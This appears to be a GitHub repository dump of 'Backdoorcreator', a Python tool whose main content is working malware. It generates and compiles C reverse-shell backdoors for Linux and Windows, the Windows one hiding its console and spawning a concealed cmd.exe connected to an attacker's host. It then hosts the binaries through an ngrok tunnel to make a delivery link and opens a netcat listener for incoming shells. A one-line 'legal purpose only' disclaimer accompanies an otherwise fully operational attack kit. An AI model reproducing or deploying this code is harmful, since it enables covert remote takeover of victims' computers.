├── README.md ├── backdoorcreate.py ├── requirements.txt ├── screenshot.png └── server.py /README.md: -------------------------------------------------------------------------------- 1 | # Backdoorcreator 2 | This tool will create backdoor and listen for incoming connections 3 | 4 | # Steps To Run This Tool On Linux: 5 | - git clone https://github.com/krishpranav/Backdoorcreator 6 | - cd Backdoorcreator 7 | - sudo chmod +x * 8 | - python3 -m pip install -r requirements.txt 9 | - python3 server.py 10 | - python3 backdoorcreate.py 11 | 12 | # Steps To Run This Tool On Mac: 13 | - git clone https://github.com/krishpranav/Backdoorcreator 14 | - cd Backdoorcreator 15 | - sudo chmod +x * 16 | - python3 -m pip install -r requirements.txt 17 | - python3 server.py 18 | - python3 backdoorcreate.py 19 | 20 | # Steps To Run This Tool On Android(Termux): 21 | - git clone https://github.com/krishpranav/Backdoorcreator 22 | - cd Backdoorcreator 23 | - chmod +x * 24 | - apt install python3 25 | - python3 -m pip install -r requirements.txt 26 | - python3 server.py 27 | - python3 backdoorcreate.py 28 | 29 | # Reference 30 | 31 | 32 | # Use This Tool Is For Legal Purpose Only 33 | 34 | - TOOL IS CREATED BY KRISNA PRANAV 35 | 36 | -------------------------------------------------------------------------------- /backdoorcreate.py: -------------------------------------------------------------------------------- 1 | from subprocess import check_output 2 | from time import sleep 3 | import os 4 | import sys 5 | import http.server 6 | import socket 7 | import re 8 | 9 | 10 | def choice(): 11 | print(""" 12 | 13 | [\033[1;39m1\033[1;36m] linux 14 | [\033[1;39m2\033[1;36m] windows 15 | [\033[1;39m3\033[1;36m] Listening Connection 16 | [\033[1;39m4\033[1;36m] Exit 17 | """) 18 | 19 | options = input("\033[1;39mSelect Your Target System : \033[1;39m") 20 | 21 | if (options == '1'): 22 | 23 | host = input("\n\033[1;36mIP: \033[1;39m") 24 | port = input("\n\033[1;36mPORT: \033[1;39m") 25 | linux_shell(host, port) 26 | os.system("gcc .linux.c -o LinuxBackDoor -pthread && rm -rf .linux.c") 27 | os.system("chmod +x LinuxBackDoor") 28 | print("\n\033[1;36mFile Saved > \033[1;39mLinuxBackDoor") 29 | 30 | os.system("python3 -m http.server 80 > .server 2> /dev/null &") 31 | os.system("chmod +x ngrok") 32 | name1 = "/LinuxBackDoor" 33 | portN = 80 34 | os.system("./ngrok http {} > /dev/null &".format(portN)) 35 | sleep(8) 36 | os.system('curl -s -N http://127.0.0.1:4040/api/tunnels | grep "https://[0-9a-z]*\.ngrok.io" -oh > link2.url') 37 | urlFile = open('link2.url', 'r') 38 | url = urlFile.read() 39 | urlFile.close() 40 | if re.match("https://[0-9a-z]*\.ngrok.io", url) != None: 41 | print("\n\033[1;36mLINK : \033[1;39m", url + name1) 42 | 43 | print(" ") 44 | 45 | if (options == '2'): 46 | 47 | host = input("\n\033[1;36mIP: \033[1;39m") 48 | port = input("\n\033[1;36mPORT: \033[1;39m") 49 | windows_reverse(host, port) 50 | os.system( 51 | "/usr/bin/i686-w64-mingw32-gcc .windows.c -o windows.exe -lws2_32 && rm -rf .windows.c") 52 | print("\n\033[1;36mFile Saved > \033[1;39mwindowsBackdoor") 53 | os.system("python3 -m http.server 80 > .server 2> /dev/null &") 54 | os.system("chmod +x ngrok") 55 | name2 = "/Windows.exe" 56 | portN = 80 57 | os.system("./ngrok http {} > /dev/null &".format(portN)) 58 | sleep(8) 59 | os.system('curl -s -N http://127.0.0.1:4040/api/tunnels | grep "https://[0-9a-z]*\.ngrok.io" -oh > link2.url') 60 | urlFile = open('link2.url', 'r') 61 | url = urlFile.read() 62 | urlFile.close() 63 | if re.match("https://[0-9a-z]*\.ngrok.io", url) != None: 64 | print("\n\033[1;36mLINK : \033[1;39m", url + name2) 65 | 66 | print(" ") 67 | 68 | if (options == '3'): 69 | port = input("\n\033[1;36mPORT: \033[1;39m") 70 | print("\n\033[1;36mWaiting For Connection ...\n") 71 | os.system("nc -l -p %s" % port) 72 | print("\033[1;36m") 73 | 74 | if (options == '4'): 75 | sys.exit() 76 | os.system("fuser -k -n tcp 80") 77 | 78 | 79 | else: 80 | choice() 81 | 82 | 83 | def linux_shell(host, port): 84 | with open(".linux.c", "w") as file: 85 | file.write(''' 86 | #include 87 | #include 88 | #include 89 | #include 90 | 91 | int main (int argc, char **argv) 92 | { 93 | int scktd; 94 | struct sockaddr_in client; 95 | 96 | client.sin_family = AF_INET; 97 | client.sin_addr.s_addr = inet_addr("%s"); 98 | client.sin_port = htons(%s); 99 | scktd = socket(AF_INET,SOCK_STREAM,0); 100 | connect(scktd,(struct sockaddr *)&client,sizeof(client)); 101 | dup2(scktd,0); // STDIN 102 | dup2(scktd,1); // STDOUT 103 | dup2(scktd,2); // STDERR 104 | execl("/bin/sh","sh","-i",NULL,NULL); 105 | return 0; 106 | } 107 | ''' % (host, port)) 108 | 109 | 110 | def windows_reverse(host, port): 111 | with open(".windows.c", "w") as file: 112 | file.write(''' 113 | #include 114 | #include 115 | #define _WINSOCK_DEPRECATED_NO_WARNINGS 116 | #pragma comment(lib,"ws2_32") 117 | WSADATA wsaData; 118 | SOCKET Winsock; 119 | SOCKET Sock; 120 | struct sockaddr_in hax; 121 | char ip_addr[16]; 122 | STARTUPINFO ini_processo; 123 | PROCESS_INFORMATION processo_info; 124 | //int main(int argc, char *argv[]) 125 | int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdParam, int iCmdShow) 126 | { 127 | FreeConsole(); 128 | WSAStartup(MAKEWORD(2,2), &wsaData); 129 | Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL); 130 | 131 | struct hostent *host; 132 | host = gethostbyname("''' + host + '''"); 133 | strcpy(ip_addr, inet_ntoa(*((struct in_addr *)host->h_addr))); 134 | hax.sin_family = AF_INET; 135 | hax.sin_port = htons(atoi("''' + port + '''")); 136 | hax.sin_addr.s_addr = inet_addr(ip_addr); 137 | WSAConnect(Winsock,(SOCKADDR*)&hax,sizeof(hax),NULL,NULL,NULL,NULL); 138 | memset(&ini_processo,0,sizeof(ini_processo)); 139 | ini_processo.cb=sizeof(ini_processo); 140 | ini_processo.dwFlags=STARTF_USESTDHANDLES; 141 | ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock; 142 | CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,CREATE_NO_WINDOW,NULL,NULL,&ini_processo,&processo_info); 143 | } 144 | ''') 145 | 146 | 147 | if __name__ == '__main__': 148 | choice() 149 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | subprocess 2 | os 3 | sys 4 | http.server 5 | re 6 | socket 7 | time 8 | -------------------------------------------------------------------------------- /screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/krishpranav/Backdoorcreator/417b15063380338cafa9fd2c23485ad107e7075b/screenshot.png -------------------------------------------------------------------------------- /server.py: -------------------------------------------------------------------------------- 1 | from subprocess import check_output 2 | import os 3 | from platform import system as systemos, architecture 4 | from wget import download 5 | 6 | 7 | def Ngrok(): 8 | if True: 9 | if 'Android' in str(check_output(('uname', '-a'))) or 'arm' in str(check_output(('uname', '-a'))): 10 | filename = 'ngrok-stable-linux-arm.zip' 11 | else: 12 | ostype = systemos().lower() 13 | if architecture()[0] == '64bit': 14 | filename = 'ngrok-stable-{0}-amd64.zip'.format(ostype) 15 | else: 16 | filename = 'ngrok-stable-{0}-386.zip'.format(ostype) 17 | url = 'https://bin.equinox.io/c/4VmDzA7iaHb/' + filename 18 | download(url) 19 | os.system('unzip ' + filename) 20 | os.system('rm -Rf ' + filename) 21 | os.system('clear') 22 | 23 | 24 | Ngrok() 25 | --------------------------------------------------------------------------------